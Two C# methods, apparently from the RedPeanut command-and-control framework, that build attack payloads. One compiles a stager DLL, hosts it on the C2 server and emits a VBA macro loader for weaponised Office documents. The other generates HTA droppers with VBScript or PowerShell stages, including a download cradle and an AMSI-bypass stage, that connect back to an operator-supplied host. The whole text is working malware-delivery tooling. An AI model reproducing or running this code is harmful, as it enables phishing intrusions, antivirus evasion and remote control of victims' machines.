private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { // Parse .cs sorce and repalce variable string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { //Building agent ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf); string outfilename = RandomAString(10, new Random()) + ".dll"; Builder.GenerateDll(source, outfilename, 35); //Add resource to webserver C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename)); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } string resourcepath = uricontent + outfilename; //Build shooter assembly source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE)); source = Replacer.ReplaceAgentShooter(source, resourcepath, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35); VBAGenerator gen = new VBAGenerator(assemblyBase64, null); //Write file to dest dir string destdir = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, EVILCLIPPY_FOLDER); File.WriteAllText(Path.Combine(destdir, filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(destdir, filename)); } } } catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }
private void Run() { List <string> args = new List <string>(); try { if (string.IsNullOrEmpty(filename) || string.IsNullOrEmpty(lhost) || lport < 1 || profile < 1) { return; } else { if (lang == "vbs") { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { //Building agent ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 35, conf); string outfilename = RandomAString(10, new Random()) + ".dll"; Builder.GenerateDll(source, outfilename, 35); //Add resource to webserver C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(outfilename, new WebResourceInstance(null, outfilename)); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } string resourcepath = uricontent + outfilename; //Build shooter assembly source = File.ReadAllText(Path.Combine(folderrpath, SHOOTER_TEMPLATE)); source = Replacer.ReplaceAgentShooter(source, resourcepath, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomAString(10, new Random()) + ".dll", 35); HtaVBSGenerator gen = new HtaVBSGenerator(assemblyBase64, null); if (hosted) { //Add resource to webserver storage c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); Console.WriteLine("[*] Resource added to webserver resources"); Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); } } } else { if (lang == "powershell") { string folderrpath = Path.Combine(Directory.GetCurrentDirectory(), WORKSPACE_FOLDER, TEMPLATE_FOLDER); if (Program.GetC2Manager().GetC2Server().GetProfiles().ContainsKey(profile)) { string psfilename = RandomString(10, new Random()) + ".ps1"; ListenerConfig conf = new ListenerConfig("", lhost, lport, Program.GetC2Manager().GetC2Server().GetProfile(profile), profile); string source = File.ReadAllText(Path.Combine(folderrpath, STAGER_TEMPLATE)); source = Replacer.ReplaceAgentProfile(source, RedPeanut.Program.GetServerKey(), 40, conf); string assemblyBase64 = Builder.GenerateDllBase64(source, RandomString(10, new Random()) + ".dll"); Dictionary <string, string> arg = new Dictionary <string, string>(); arg.Add("#{lhost}", lhost); arg.Add("#{lport}", lport.ToString()); string uricontent = Program.GetC2Manager().GetC2Server().GetProfile(profile).ContentUri; uricontent = uricontent.TrimStart('/'); if (!uricontent.EndsWith("/")) { uricontent += "/"; } arg.Add("#{uri}", uricontent + "s2_" + psfilename); byte[] assemblybytte = Convert.FromBase64String(assemblyBase64); string agentCompBase64 = Convert.ToBase64String(CompressAssembly(assemblybytte)); Dictionary <string, string> argagent = new Dictionary <string, string>(); argagent.Add("#{bytelen}", assemblybytte.Length.ToString()); PowershellCradleGenerator gen_s0 = new PowershellCradleGenerator(agentCompBase64, arg); PowershellAmsiGenerator gen_s1 = new PowershellAmsiGenerator(agentCompBase64, arg); PowershellAgentGenerator gen_s2 = new PowershellAgentGenerator(agentCompBase64, argagent); HtaPowerShellGenerator gen = new HtaPowerShellGenerator(gen_s0.GetScriptText(), null); if (hosted) { //Add resource to webserver storage C2Manager c2manager = Program.GetC2Manager(); c2manager.GetC2Server().RegisterWebResource(filename, new WebResourceInstance(gen, filename)); c2manager.GetC2Server().RegisterWebResource(psfilename, new WebResourceInstance(gen_s1, psfilename)); c2manager.GetC2Server().RegisterWebResource("s2_" + psfilename, new WebResourceInstance(gen_s2, "s2_" + psfilename)); Console.WriteLine("[*] Resource added to webserver resources"); Console.WriteLine("[*] Starting point at https://{0}:{1}/{2}", lhost, lport, uricontent + filename); return; } else { //Write file to tmp env dir File.WriteAllText(Path.Combine(Path.GetTempPath(), filename), gen.GetScriptText()); File.WriteAllText(Path.Combine(Path.GetTempPath(), psfilename), gen_s1.GetScriptText()); File.WriteAllText(Path.Combine(Path.GetTempPath(), "s2_" + psfilename), gen_s2.GetScriptText()); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), filename)); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), psfilename)); Console.WriteLine("[*] {0} Created", Path.Combine(Path.GetTempPath(), "s2_" + psfilename)); } } } else { Console.WriteLine("[*] Language not supported {0} (powershell,vbs)", lang); return; } } } }catch (Exception e) { Console.WriteLine("[*] Error running task build {0}", e.Message); return; } }